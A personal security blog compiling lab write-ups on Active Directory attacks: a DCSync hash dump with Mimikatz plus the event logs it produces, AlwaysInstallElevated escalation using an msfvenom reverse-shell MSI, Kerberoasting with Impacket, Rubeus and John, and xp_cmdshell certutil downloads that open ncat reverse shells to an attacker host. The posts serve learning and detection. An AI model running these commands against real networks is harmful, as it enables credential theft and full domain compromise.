Sunday, January 2, 2022

Beginning DC Sync - Attack

In this post, I learning about how we can perform and detect a DC Sync attack using Mimikatz. In a DCSync attack, we are standing up a normal computer to act as a domain controller. Once this "normal" computer acts like a domain controller, we can then perform replication, requesting information on a particular user or all users if we wish.

I connected to a workstation as a user with Domain Admin privileges. 

C:\Tools\mimikatz_trunk\x64
λ whoami /upn
admin@securitynik.local

Confirming the group membership.

C:\Tools\mimikatz_trunk\x64
λ net group "Domain Admins" /domain
The request will be processed at a domain controller for domain securitynik.local.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
mysqlsvc                 admin                    Administrator

The command completed successfully.

Before going any further, I've configured my Windows 2019 server, to track replication changes.

Group Policy Management -> My Domain Policy ("SecurityNik - Default - Domain Policy") -> Computer Configuration -> Advanced Audit Policy Configuration -> Audit Policies -> DS Access:
    Detailed Directory Service Replication: Success and Failure
    Directory Service Access : Success and Failure
    Active Directory Domain Services Object Changes : Success and Failure
    Directory Service Replication : Success and Failure.

First up, collecting information about a particular user

C:\Tools\mimikatz_trunk\x64                                                                                  
λ mimikatz.exe "lsadump::dcsync /domain:securitynik.local /user:tq" exit                                     
                                                                                                             
  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59                                                 
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                  
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                     
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                                                       
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )                                    
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/                                    
                                                                                                             
mimikatz(commandline) # lsadump::dcsync /domain:securitynik.local /user:tq                                   
[DC] 'securitynik.local' will be the domain                                                                  
[DC] 'dc-2019.securitynik.local' will be the DC server                                                       
[DC] 'tq' will be the user account                                                                           
                                                                                                             
Object RDN           : tq                                                                                    
                                                                                                             
** SAM ACCOUNT **                                                                                            
                                                                                                             
SAM Username         : tq                                                                                    
User Principal Name  : tq@securitynik.local                                                                  
Account Type         : 30000000 ( USER_OBJECT )                                                              
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )                                        
Account expiration   :                                                                                       
Password last change : 10/16/2021 12:55:37 PM                                                                
Object Security ID   : S-1-5-21-2112827174-2190297626-1763567496-1104                                        
Object Relative ID   : 1104                                                                                  
                                                                                                             
Credentials:                                                                                                 
  Hash NTLM: 23e1d10001876b0078a9a779017fc026                                                                
    ntlm- 0: 23e1d10001876b0078a9a779017fc026                                                                
    ntlm- 1: 23e1d10001876b0078a9a779017fc026                                                                
    lm  - 0: 28efaa5798e5b2fedee619ea7e0116d4                                                                
    lm  - 1: df03317c4db79c05f4db99852f01f006                                                                
                                                                                                             
Supplemental Credentials:                                                                                    
* Primary:NTLM-Strong-NTOWF *                                                                                
    Random Value : 81800db4fa61ba2c6cf2164e34759c2a                                                          
...

Looking specifically at the Security Event log for event with ID 4928 relating to Detailed Directory Replication, we see the various naming contexts being replicated with SECURITYNIK-WIN. This device is my Windows 10 host and is not a Domain Controller.

An Active Directory replica source naming context was established.

Destination DRA:	CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA:	CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address:	1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context:	CN=Schema,CN=Configuration,DC=securitynik,DC=local
Options:		2147484016
Status Code:	0

An Active Directory replica source naming context was established.

Destination DRA:	CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA:	CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address:	1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context:	DC=securitynik,DC=local
Options:		368
Status Code:	0

Looking at Event 1548 in the Directory Service log, we see:

During replication, Active Directory Domain Services found the following object or its parent object in a directory partition on the local domain controller that is different from the following directory partition from which changes are being replicated. This can occur when the object or its parent object has been moved across partitions. However, due to replication latency, one of the directory servers has not yet received notification of the move. 
 
Object:
CN=tq,OU=SecurityNik-Users,DC=securitynik,DC=local 
Object GUID:
7b76ce2a-c5d9-42ec-b246-cba68d5d23ee 
Parent object GUID (if available):
9234d83c-d3fc-49c0-8024-2eee57d9179b 
Directory partition:
CN=Configuration,DC=securitynik,DC=local 
Source directory server:
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
 
Replication of this directory partition from this source directory server cannot continue at this time. This condition is transient. An attempt to replicate this directory partition will be tried again later.

Looking at event 2088, we see

Invalid DNS configuration may be affecting other essential operations on member computers, domain controllers or application servers in this Active Directory Domain Services forest, including logon authentication or access to network resources. 
 
You should immediately resolve this DNS configuration error so that this domain controller can resolve the IP address of the source domain controller using DNS. 
 
Alternate server name: 
 SECURITYNIK-WIN10.securitynik.local 
Failing DNS host name: 
 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 

The attempt to establish a replication link for the following writable directory partition failed. 
 
Directory partition: 
CN=Configuration,DC=securitynik,DC=local 
Source directory service: 
CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local 
Source directory service address: 
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
Intersite transport (if any): 

The attempt to establish a replication link for the following writable directory partition failed. 
 
Directory partition: 
CN=Configuration,DC=securitynik,DC=local 
Source directory service: 
CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local 
Source directory service address: 
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
Intersite transport (if any): 

There were quite a few errors about this failing in the Directory service log that might suggestion this is a potential issues.

References:
https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It.pdf
https://stealthbits.com/blog/dcshadow-attacking-active-directory-rogue-dcs/
https://pentestlab.blog/2018/04/16/dcshadow/
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928

Beginning exploitation of AlwaysInstallElevated

Leveraging the AlwaysInstallElevated policy, allows an administrator to install a Windows installer package with system level privileges.

This is not recommended for use by Microsoft today. However, it is something I'm learning more about as I pursue my GPEN.

To be able to leverage this facility, two registry keys need to be set. These are:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Checking to the see if it is set on HKLM.

C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer /s /f allwaysInstallElevated
End of search: 0 match(es) found.

Nothing found under HKLM, checking HKCU.

C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer /s /f allwaysInstallElevated
End of search: 0 match(es) found.

Nothing found. Now I'm going to add the values, so that I can test the vulnerability.

C:\>reg ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

C:\>reg ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

Verifying the entries have been created.

C:\>reg query HKlM\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

With the two entries in place, time to create an executable via MSFVenom.

┌──(root💀securitynik)-[~/Downloads]
└─# msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=10.0.0.107 LPORT=9999 --format msi --out malicious.msi --smallest
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: malicious.msi

Setup a listener on port 9999.

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Setup a web server to host the malicious file.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Before downloading the file and since this is about privilege escalation, time to verify the privileges this user has.

C:\tmp>whoami
sec560student\sec560


C:\tmp>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes           
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192  

Downloading the file, using Certutil.

C:\tmp>certutil -URLCache -f http://10.0.0.107:80/malicious.msi malicious.msi
****  Online  ****
CertUtil: -URLCache command completed successfully.

Confirming the file was downloaded.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [28/Nov/2021 19:12:25] "GET /malicious.msi HTTP/1.1" 200 -

Running the msiexec command.

C:\tmp>msiexec /quiet /qn /i malicious.msi

At this point, looking at the last command, it looks like nothing happened. Looking back at my ncat session, we see.

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Ncat: Connection from 10.0.0.110.
Ncat: Connection from 10.0.0.110:2283.
Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
C:\WINDOWS\system32>

Voila! We have a shell. Confirming the rights our shell now has.

C:\WINDOWS\system32>whoami                                                                                  
whoami                                                                                                      
nt authority\system 


C:\WINDOWS\system32>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes                                        
====================================== ================ ============================================================== ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                     
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT SERVICE\msiserver                   Well-known group S-1-5-80-685333868-2237257676-1431965530-1907094206-2438021966 Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner   

That's it for this post!

References:
https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated
https://steflan-security.com/windows-privilege-escalation-alwaysinstallelevated-policy/
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/


Analyzing the logs and packets from a post Kerberoasting activity

In the previous post, I did the Kerberoasting attack. The log entry at the time of running impacket-mssqlclient did not show me anything that I thought was immediately interesting. Actually it instead surprised me. I was really hoping to see information such as the Workstation Name, Source Network Address, Source Port. Especially when the Logon Type is reported as 3 below.

An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		SECURITYNIK\sql-service
	Account Name:		sql-service
	Account Domain:		SECURITYNIK
	Logon ID:		0x4F4F11
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.
...

Looking at another entry did peek my interest though. Why would sqlservr.exe be spawning cmd.exe with command line "C:\Windows\system32\cmd.exe" /c whoami. This is definitely more interesting than the above entry.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x123c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c whoami

Next up, we see cmd.exe executing the whoami.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1724
	New Process Name:	C:\Windows\System32\whoami.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x123c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	whoami

Here we see the Domain Admins group being enumerated.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x360
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c net groups "Domain Admins"

Here we see the hosts downloading ncat.exe via Certutil.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1598
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe

Here is what it looked like when the ncat was executed.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc6c
	New Process Name:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1578
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe  10.0.0.107 443 --ssl --exec cmd.exe

While I was looking at the logs to see what transpired, I was also capturing packets using the following:

┌──(root💀securitynik)-[~/packets]
└─# tcpdump -nnt --interface eth0 -w impacket-sql.pcap '(host 10.0.0.5) and not(arp or ip6 or port(1900))' -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C2841 packets captured
2841 packets received by filter
0 packets dropped by kernel

Interestingly, I thought most of the communication was encrypted but I was wrong. As I looked at a few packets, I could see the queries I executed.

Looking at the type of packets captured.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -q -z io,phs

===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:2841 bytes:4068111
  ip                                     frames:2841 bytes:4068111
    tcp                                  frames:2835 bytes:4066653
      tds                                frames:90 bytes:460551
        _ws.malformed                    frames:7 bytes:2500
        tcp.segments                     frames:2 bytes:12052
      tds.prelogin                       frames:1 bytes:320
        tds.prelogin                     frames:1 bytes:320
      data                               frames:135 bytes:8100
      http                               frames:4 bytes:11948
        media                            frames:2 bytes:11564
          tcp.segments                   frames:2 bytes:11564
      tls                                frames:827 bytes:121673
    udp                                  frames:6 bytes:1458
      nbdgm                              frames:6 bytes:1458
        smb                              frames:6 bytes:1458
          mailslot                       frames:6 bytes:1458
            browser                      frames:6 bytes:1458
===================================================================

Looking at the tds messages, first up the "type == 1"

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 1'
   20   9.933875   10.0.0.107 → 10.0.0.5     TDS 316 SQL batch
   24  17.281790   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
   92 973.952996   10.0.0.107 → 10.0.0.5     TDS 170 SQL batch
   96 981.491834   10.0.0.107 → 10.0.0.5     TDS 168 SQL batch
  100 987.357432   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
  104 996.015944   10.0.0.107 → 10.0.0.5     TDS 138 SQL batch
  ....

Looking at some of the responses, "type == 4"

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 4'
    6   0.101021     10.0.0.5 → 10.0.0.107   TDS 91 Response
   15   0.111340     10.0.0.5 → 10.0.0.107   TDS 333 Response[Malformed Packet]
   17   0.129048     10.0.0.5 → 10.0.0.107   TDS 473 Response
   22  10.135335     10.0.0.5 → 10.0.0.107   TDS 666 Response
   26  17.489552     10.0.0.5 → 10.0.0.107   TDS 173 Response
   94 974.032998     10.0.0.5 → 10.0.0.107   TDS 294 Response
  ....

Looking at some of these messages, I see the commands I executed.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y '(tds.type == 1) || (tds.type == 4)' -T fields -e tds.type -e tds.query -E header=y | moreRunning as user "root" and group "root". This could be dangerous.
tds.type        tds.query
4
4
4
1       exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFI
GURE;\r\n
4
1       exec master..xp_cmdshell 'whoami'\r\n
1       exec master..xp_cmdshell 'net users'\r\n
1       exec master..xp_cmdshell 'net groups "Domain Admins"'\r\n
1       exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe'\r\n
1       exec master..xp_cmdshell 'cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"'\r\n

I was able to see the responses also. However, in most cases it does not really make sense to post them here.

Ok, that's it for me and this post.

Beginning Kerberoasting

In Kerberoasting, we are leveraging the fact that the requested ticket, is encrypted with the password of the service account for which that service is using. Therefore, the objective is to request a ticket for that service and then crack the service account passwords so that the service's credential can be reused.

First up, using the account from the ASP-REQ Roasting post which was just completed, querying the domain for SPN's using impacket-GetUserSPNS.

┌──(root💀securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL                              
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                     Name              MemberOf  PasswordLastSet             LastLogon                   Delegation 
---------------------------------------  ----------------  --------  --------------------------  --------------------------  ----------
cifs/cifs.securitynik.local              cifs-service                2021-11-10 21:33:08.377237  <never>                                
HTTP/http.securitynik.local:80           http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http                                http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http.securitynik.local              http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/www.securitynik.local               kerberos-service            2021-10-22 22:34:26.733216  <never>                                
MSSQLSvc/dc-2019.securitynik.local:1433  sql-service                 2021-11-16 04:58:08.706286  2021-11-16 17:30:56.779153 

Requesting a Service Ticket for the account with  MSSQLSvc/dc-2019.securitynik.local:1433.

┌──(root💀securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL -request -outputfile GetUserSPNs.hashes

Leveraging Rubeus to grab the tickets instead from a Windows host.

C:\Tools>Rubeus.exe kerberoast /domain:securitynik.local /outfile:kerberoasting.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : securitynik.local
[*] Searching path 'LDAP://securitynik.local/DC=securitynik,DC=local' for Kerberoastable users

[*] Total kerberoastable users : 4


[*] SamAccountName         : cifs-service
[*] DistinguishedName      : CN=cifs Service,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : cifs/cifs.securitynik.local
[*] PwdLastSet             : 11/11/2021 2:33:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : http-spn
[*] DistinguishedName      : CN=HTTP SPN,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/http.securitynik.local:80
[*] PwdLastSet             : 11/9/2021 2:32:04 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : kerberos-service
[*] DistinguishedName      : CN=Kerberos Service,CN=Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/www.securitynik.local
[*] PwdLastSet             : 10/23/2021 2:34:26 AM
[*] Supported ETypes       : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : sql-service
[*] DistinguishedName      : CN=SERVICE,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dc-2019.securitynik.local:1433
[*] PwdLastSet             : 11/16/2021 9:58:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes

[*] Roasted hashes written to : C:\Tools\kerberoasting.hashes

Now that we have the hashes from two different tools, I will take the one from Impacket-GetUserSPNS and feed that to John.

┌──(root💀securitynik)-[~/packets]
└─# john GetUserSPNs.hashes 
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Testing1         (?)
Testing1         (?)
Testing1         (?)
Testing1         (?)
4g 0:00:00:00 DONE 2/3 (2021-11-17 22:18) 50.00g/s 198400p/s 793600c/s 793600C/s Tara1..Smurfy1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John returned the passwords but I'm not sure why it has the (?). 

Leveraging the password Testing1 with username sql-service, against MSSQLSvc/dc-2019.securitynik.local:1433. We need to target the service account which is being used by that SPN. In this case, the service is MSSQL. Let's leverage the Impacket suite once again. This time, using impacket-mssqlclient to target the MSSQL service.

┌──(root💀securitynik)-[~]
└─# impacket-mssqlclient securitynik.local/sql-service:Testing1@10.0.0.5 -windows-auth
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 19162) 
[!] Press help for extra shell commands
SQL> 

Now that we are in, let's get some help.

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> 

Let's execute enable_xp_cmdshell.

SQL> enable_xp_cmdshell
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

Let's now run a few commands

SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

nt service\mssql$sqlexpress                                                        

NULL    

Running something more meaningful.

SQL> xp_cmdshell net groups "Domain Admins"
output                                                                             

--------------------------------------------------------------------------------   

Group name     Domain Admins                                                       

Comment        Designated administrators of the domain                             

NULL                                                                               

Members                                                                            

NULL                                                                               

-------------------------------------------------------------------------------    

3202357359SA             admin                    Administrator                    

ANGELINE_WHITAKER        CARMEN_DURAN             DOREEN_MORIN                     

JACKSON_SOSA             LOUISA_MCPHERSON         MISTY_CALHOUN                    

mysqlsvc                                                                           

The command completed successfully.                                                

NULL                                                                               

NULL   

That is all interesting so far. Let's get a ncat shell to come back to my attacking machine.

First up, let's setup a webserver to host ncat.exe. 

┌──(root💀securitynik)-[~]
└─# cd /home/securitynik/WinTools/

┌──(root💀securitynik)-[~/WinTools]
└─# ls ncat.exe
ncat.exe

┌──(root💀securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Using certutil to download ncat.exe.

SQL> xp_cmdshell certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe
output                                                                   
--------------------------------------------------------------------------------   

****  Online  ****                                                                 

CertUtil: -URLCache command completed successfully.                                

NULL                                

Confirming on our attacking machine, that the file was successfully download.

┌──(root💀securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -

Next, setup a ncat listener on our attacking machine, only allowing the compromised machine to connect. We also are going to take advantage of SSL to hide our activities while blending in.

┌──(root💀securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443

Connecting from the compromise machine.

SQL> xp_cmdshell cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"

Looking at the ncat listener, we now have a shell.

┌──(root💀securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
